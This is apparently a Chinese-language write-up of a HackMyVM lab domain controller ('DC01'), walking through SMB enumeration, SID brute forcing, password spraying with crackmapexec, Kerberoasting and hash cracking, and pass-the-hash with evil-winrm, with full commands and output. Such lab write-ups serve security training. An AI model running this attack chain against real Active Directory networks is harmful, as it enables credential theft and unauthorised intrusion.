打靶记录(一一八)之HMVDC01

所进行渗透的靶机ip为192.168.56.130

端口扫描

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 16:56 UTC
Nmap scan report for 192.168.56.130 (192.168.56.130)
Host is up (0.00031s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
49683/tcp open  unknown
MAC Address: 08:00:27:57:B6:6B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 192.168.56.130  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 16:59 UTC
Nmap scan report for 192.168.56.130 (192.168.56.130)
Host is up (0.00047s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-14 07:59:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
MAC Address: 08:00:27:57:B6:6B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-14T07:59:24
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:57:b6:6b (Oracle VirtualBox virtual NIC)
|_clock-skew: 14h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.87 seconds

添加域名soupedecode.local至/etc/hosts

Lookupsid

没有任何凭证，只能从smb枚举入手

┌──(mikannse㉿kali)-[~/桌面]
└─$ smbmap -H 192.168.56.130 -u anonymous     

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.56.130:445      Name: SOUPEDECODE.LOCAL0        Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backup                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

有一个IPC$共享可以读取,但是什么都没有

┌──(mikannse㉿kali)-[~/桌面]
└─$ smbclient //192.168.56.130/IPC$  
Password for [WORKGROUP\mikannse]:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_NO_SUCH_FILE listing \*

可以看到上面还有很多其他的共享，但是匿名身份是没有权限

搜寻一下用户,其实就是ldap枚举

┌──(mikannse㉿kali)-[~/桌面]
└─$ lookupsid.py 'soupedecode.local/anonymous@192.168.56.130'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 192.168.56.130
[*] StringBinding ncacn_np:192.168.56.130[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
...

将结果保存下来，并且提取出用户名成一个字典

with open('user.txt','r') as file1:
    data=file1.read()
lines=data.splitlines()
with open('username.txt','w') as file2:
    for line in lines:
        list=line.split()
        username=list[1][12:]
        file2.write(username+'\n')
print('Done')

┌──(mikannse㉿kali)-[~/桌面]
└─$ crackmapexec smb 192.168.56.130 -u username.txt -p username.txt --continue-on-success --no-bruteforce

得到一组有效凭证ybob317:ybob317

现在能够访问Users共享,在ybob317桌面找到第一个userflag

Kerberoasting

使用getuserspns

┌──(mikannse㉿kali)-[~/桌面]
└─$ GetUserSPNs.py -dc-ip 192.168.56.130 SOUPEDECODE.LOCAL/ybob317:ybob317 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------  --------------  --------  --------------------------  ---------  ----------
FTP/FileServer          file_svc                  2024-06-17 17:32:23.726085  <never>               
FW/ProxyServer          firewall_svc              2024-06-17 17:28:32.710125  <never>               
HTTP/BackupServer       backup_svc                2024-06-17 17:28:49.476511  <never>               
HTTP/WebServer          web_svc                   2024-06-17 17:29:04.569417  <never>               
HTTPS/MonitoringServer  monitoring_svc            2024-06-17 17:29:18.511871  <never>               



[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

似乎因为时间不同步从而无法kerberos验证，使用rdate将kali时钟与靶机同步

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo rdate -n 192.168.56.130                                                   
Sun Jul 14 20:29:16 UTC 2024

sudo GetUserSPNs.py -dc-ip 192.168.56.130 SOUPEDECODE.LOCAL/ybob317:ybob317 -request >hash

┌──(mikannse㉿kali)-[~/桌面]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

得到凭证为file_svc:Password123!!

哈希传递

再次smb连接backup共享，得到一些用户以及NTLM哈希

爆破无果，之前在Users共享中存在一个FileServer$,用它传递哈希,成功拿到shell

┌──(mikannse㉿kali)-[~/桌面]
└─$ evil-winrm -i soupedecode.local -u 'FileServer$' -H 'e41da7e79a4c76dbd9cf79d1cb325559'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents> 

在admin的桌面找到flag

碎碎念

好久没有打DC了，还是很有收获的。这个房间主要是围绕凭证收集来与SMB共享交互进行的，是一个练习凭证收集非常不错的房间。学到了新的”lookupsid”的方式